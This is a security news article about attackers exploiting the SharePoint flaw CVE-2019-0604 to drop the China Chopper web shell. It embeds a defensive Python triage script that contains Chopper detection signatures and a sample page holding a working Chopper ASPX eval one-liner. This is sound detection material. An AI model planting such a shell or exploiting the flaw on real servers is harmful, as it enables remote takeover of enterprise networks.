SharePoint Problem Returns. Be Afraid.

Published: 23/11/2024   Category: security




Both Canada and Saudi Arabia issued alerts to the security community that they had observed traces of CVE-2019-0604 as part of other cyber attacks.



CVE-2019-0604, the SharePoint problem that became semi-famous because Microsoft had to reissue the patch for it after it had already put one out, has been seen in the wild.
Both Canada and Saudi Arabia issued alerts to the security community that they had observed traces of its presence as part of other cyber attacks.
Both of them said that the exploit ended up delivering the China Chopper web shell to vulnerable servers.
The Saudi alert says that within the previous two weeks the Chopper had been dropped on multiple organizations compromised through active exploitation of CVE-2019-0604, a vulnerability that grants remote code execution.
It also warns that the impact is poised to be highly amplified, since SharePoint is Internet-facing in most targets and, in most cases, integrated with the internal Active Directory, which turns a compromised SharePoint server into a path toward the domain.
Not only is this exploitation technique still relatively successful, it is simple and can be performed using an HTTP request.
The alert also makes the point that organizations may not have previously prioritized patching of vulnerabilities that were not known to be actively exploited. Like this one.
Once the first proof-of-concept (PoC) code for this problem hit, the Saudis observed a spike in scanning for this specific vulnerability, which indicates rapid adoption by multiple threat actors keen to use this easy, remote access to organization networks.
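The two observations above, that the payload is the China Chopper web shell and that it is driven over plain HTTP requests, suggest the check a SharePoint administrator would want to run. The script below is an added example, not code from the article or from either government alert. It looks for the publicly documented China Chopper server-side one-liners in page sources under the SharePoint web root and correlates any hit with anonymous POST requests to .aspx pages in the IIS W3C log (a Chopper client POSTs its commands to the dropped page). The page contents, the /_layouts/15/ URL mapping, the log lines and the rule that only anonymous POSTs count are all constructed or assumed for the example.

```python
import re
from collections import defaultdict

# Public China Chopper server-side one-liners (ASP.NET/JScript, classic ASP, PHP).
# Matching is case-insensitive and tolerant of whitespace, but these are exact-family
# signatures: a renamed password parameter still matches, a re-encoded shell does not.
CHOPPER_SIGNATURES = [
    ("china-chopper-aspx", re.compile(r'eval\s*\(\s*Request\.Item\s*\[\s*["\']', re.I)),
    ("china-chopper-asp",  re.compile(r'<%\s*eval\s*\(?\s*request\s*\(', re.I)),
    ("china-chopper-php",  re.compile(r'@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[', re.I)),
]


def match_webshell(content: str) -> list:
    """Names of the China Chopper variants whose one-liner appears in a page's source."""
    return [name for name, rx in CHOPPER_SIGNATURES if rx.search(content)]


# Constructed sample: page sources keyed by URL path, standing in for a walk of the
# SharePoint LAYOUTS directory mapped to /_layouts/15/ (assumed). Only t.aspx is a shell.
SAMPLE_FILES = {
    "/_layouts/15/start.aspx": '<%@ Page Language="C#" Inherits="Microsoft.SharePoint.WebControls.LayoutsPageBase" %>',
    "/_layouts/15/t.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "/_layouts/15/help.aspx": '<%@ Page Language="C#" %><% Response.Write("ok"); %>',
}

# IIS W3C extended log fields in the default order; the constructed log below uses it.
IIS_FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "s-port",
              "cs-username", "c-ip", "cs(User-Agent)", "cs(Referer)", "sc-status",
              "sc-substatus", "sc-win32-status", "time-taken"]

# Constructed IIS log: a normal authenticated GET, two anonymous POSTs from one external
# address to the shell, and an authenticated POST to a legitimate page (not flagged).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2019-05-08 03:11:02 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\\alice 10.0.0.77 Mozilla/5.0 - 200 0 0 120
2019-05-08 03:12:40 10.0.0.5 POST /_layouts/15/t.aspx - 443 - 203.0.113.9 Mozilla/5.0 - 200 0 0 35
2019-05-08 03:12:41 10.0.0.5 POST /_layouts/15/t.aspx - 443 - 203.0.113.9 Mozilla/5.0 - 200 0 0 40
2019-05-08 03:15:00 10.0.0.5 POST /_layouts/15/help.aspx - 443 CORP\\bob 10.0.0.78 Mozilla/5.0 - 200 0 0 20
"""


def parse_iis(text: str) -> list:
    """Parse W3C log lines into dicts; comment lines and malformed rows are skipped."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if len(parts) == len(IIS_FIELDS):
            rows.append(dict(zip(IIS_FIELDS, parts)))
    return rows


def triage(files: dict, log_text: str) -> dict:
    """Correlate on-disk shell signatures with anonymous POSTs to .aspx pages.

    SharePoint itself generates many authenticated POSTs to .aspx pages, so only
    POSTs without a cs-username are treated as suspicious here (an assumption that
    holds for a Chopper client talking straight to its dropped page).
    """
    shell_files = {path for path, src in files.items() if match_webshell(src)}
    anon_posts = defaultdict(list)          # uri -> list of client IPs
    for row in parse_iis(log_text):
        uri = row["cs-uri-stem"].lower()
        if row["cs-method"] == "POST" and uri.endswith(".aspx") and row["cs-username"] == "-":
            anon_posts[uri].append(row["c-ip"])
    return {
        "shell_files": sorted(shell_files),
        "anonymous_posts": dict(anon_posts),
        "confirmed": sorted(shell_files & set(anon_posts)),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_FILES, SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On the constructed input this reports t.aspx as the only shell file, the two anonymous POSTs to it from 203.0.113.9, and t.aspx as the one confirmed hit; the authenticated POST to help.aspx is ignored. The signatures are trivial to evade by re-encoding, so on a real server pair this with a file-hash comparison of the LAYOUTS directory against a known-good install and treat any .aspx that Microsoft did not ship as a finding in its own right.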
So they have quite reasonably come to the conclusion that "threat actors with varying motivations are often quick to weaponize PoC code following public disclosures. This swift exploitation ultimately increases the likelihood that their campaigns will be successful."
Canada found that the academic, utility, heavy industry, manufacturing and technology sectors were all affected by this activity. The Canadians were also polite about why this happened: "Microsoft released security updates addressing this vulnerability in February and March 2019; however, many systems remain outdated."
Security maven Kevin Beaumont tweeted the sightings in the wild to others, while adding his own comment.
There isn't yet a public (web accessible) exploit for RCE against SharePoint (the ones on Github and ZDI don't work out the box). If that changes I think this will be one of the biggest vulns in years. It would own a lot of enterprises. Like, a LOT.
But his assessment of the threat actors is simple.
Note some APT and crimeware groups are already using it, i.e. ones with skills.
This fits in with the Saudis saying the vulnerability is desirable to use while finding evidence of skilled attackers doing just that. The public exploits are nonfunctional, which keeps the script kiddies ("skids") from using them. But if a functional one is posted, that would change the dynamics of the situation greatly. Mr. Beaumont seems to agree.
Patch. Now.
— Larry Loeb has written for many of the last century's major dead-tree computer magazines, having been, among other things, a consulting editor for BYTE magazine and senior editor for the launch of WebWeek.
